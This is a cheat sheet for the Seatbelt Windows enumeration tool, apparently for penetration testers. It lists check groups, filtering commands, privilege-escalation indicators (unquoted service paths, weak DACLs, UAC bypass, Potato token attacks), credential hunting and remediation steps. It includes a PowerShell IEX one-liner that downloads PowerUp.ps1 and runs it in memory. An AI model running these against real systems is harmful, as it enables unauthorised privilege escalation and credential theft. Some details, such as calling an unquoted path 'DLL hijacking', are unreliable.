Seatbelt

Seatbelt is a C# Windows enumeration tool providing detailed system security assessments, vulnerability discovery, and privilege escalation path identification.

Installation

# Download compiled binary
https://github.com/GhostPack/Seatbelt/releases

# Compile from source (requires Visual Studio)
git clone https://github.com/GhostPack/Seatbelt.git
cd Seatbelt
# Open Seatbelt.sln in Visual Studio and build

Basic Usage

Command	Description
Seatbelt.exe -h	Display help and groups
Seatbelt.exe -group=all	Run all checks
Seatbelt.exe -group=system	System information
Seatbelt.exe -group=user	User and group info
Seatbelt.exe -group=network	Network enumeration
Seatbelt.exe -group=dotnet	.NET information
Seatbelt.exe -group=misc	Miscellaneous checks

Enumeration Groups

System Group

Seatbelt.exe -group=system

• OS version and build
• System boot time
• Hotfixes and patches
• Running processes (elevation context)
• Processor and memory info

User Group

Seatbelt.exe -group=user

• Current user and privileges
• User groups and memberships
• Clipboard content
• Desktop files and shortcuts
• User environment variables
• Scheduled tasks by user

Network Group

Seatbelt.exe -group=network

• Network adapters and configuration
• ARP table
• Routing table
• Active network connections
• DNS configuration
• Firewall rules

Process Group

Seatbelt.exe -group=process

• All running processes
• Process privileges
• Process integrity level
• DLL and module loads
• Window titles (may contain sensitive data)

Services Group

Seatbelt.exe -group=services

• All services and status
• Service binary paths (unquoted path detection)
• Service DACL permissions
• Service startup type
• Service logon users

Software Group

Seatbelt.exe -group=software

• Installed applications
• Software versions
• Install paths
• Known vulnerable software detection

Misc Group

Seatbelt.exe -group=misc

• Event log information
• Available credentials
• WMI Event Subscriptions
• Windows Defender status
• Antivirus products
• RDP sessions
• Recycle bin contents
• Browser history and credentials

Detailed Command Examples

Check UAC Configuration

Seatbelt.exe -group=system | findstr /i "UAC"

Find Unquoted Service Paths

Seatbelt.exe -group=services | findstr /i "unquoted"

List Privilege-Escalation Vectors

Seatbelt.exe -group=all | findstr /i "privesc\|unquoted\|admin\|system"

Check for Vulnerable Software

Seatbelt.exe -group=software
# Cross-reference versions with known CVEs

Network Reconnaissance

Seatbelt.exe -group=network
# Identify exposed services and listening ports

Check Credentials

Seatbelt.exe -group=misc | findstr /i "credential\|password"

Key Privilege Escalation Indicators

Critical Findings

1. Unquoted Service Paths

Service: VulnerableService
Binary: C:\Program Files\Vulnerable Program\service.exe
Problem: Exploitable via DLL hijacking at C:\Program.exe

2. Weak Service Permissions

Service DACL allows Everyone/Authenticated Users to:
- Stop/Start service
- Change service binary path
- Change service logon user

3. UAC Bypass Opportunities

• UAC level set to “Never notify”
• AutoElevation enabled on vulnerable apps
• COM object elevation opportunities

4. Kernel Vulnerabilities

• Missing patches enabling local privilege escalation
• Vulnerable drivers installed

5. Token Impersonation

• SeImpersonatePrivilege enabled
• Potato attacks available (Rotten/Golden/Sweet Potato)

Important Findings

• Services running with weak permissions
• Interesting scheduled tasks
• Browser saved credentials
• Configuration files with passwords
• Writable system directories
• Weak registry permissions

Output Parsing Tips

# Save output to file for analysis
Seatbelt.exe -group=all > seatbelt_output.txt

# Search for specific keywords
findstr /i "admin\|system\|privesc\|unquoted" seatbelt_output.txt

# Count findings
findstr /r "^\*" seatbelt_output.txt | find /c "*"

Combining with Other Tools

# Run Seatbelt then PowerUp for redundancy
Seatbelt.exe -group=all
powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Invoke-AllChecks"

# Use with winPEAS for comprehensive enumeration
winPEASx64.exe all

Remediation Actions

Based on Seatbelt findings:

1. Unquoted Service Paths - Add quotes to service binary paths
2. Service Permissions - Restrict service DACLs to minimal required users
3. Scheduled Tasks - Audit and remove unnecessary tasks
4. UAC - Set to appropriate security level
5. Hotfixes - Apply all security patches and updates
6. Credentials - Audit and remove stored credentials
7. Antivirus - Ensure Windows Defender or equivalent is enabled

Advanced Scenarios

Detecting Privilege Escalation Vectors

# Services running as SYSTEM with weak permissions
Seatbelt.exe -group=services | Select-String "SYSTEM" | Select-String "Everyone\|Authenticated Users"

# Unquoted paths in user-writable directories
Seatbelt.exe -group=services | Select-String "unquoted" | Select-String "Program Files\|Temp"

Identifying Lateral Movement Opportunities

Seatbelt.exe -group=network
# Find accessible network shares, RDP sessions, etc.

Persistence Mechanisms

Seatbelt.exe -group=user
# Review scheduled tasks and Run registry entries

Related Tools

• winPEAS: General Windows privilege escalation enumeration
• PowerUp: PowerShell-based privilege escalation checks
• SharpUp: C# port of PowerUp
• PrivEsc: Another C# enumeration tool
• GodPotato/JuicyPotato: Token impersonation exploits

---

Last updated: March 2025 | GitHub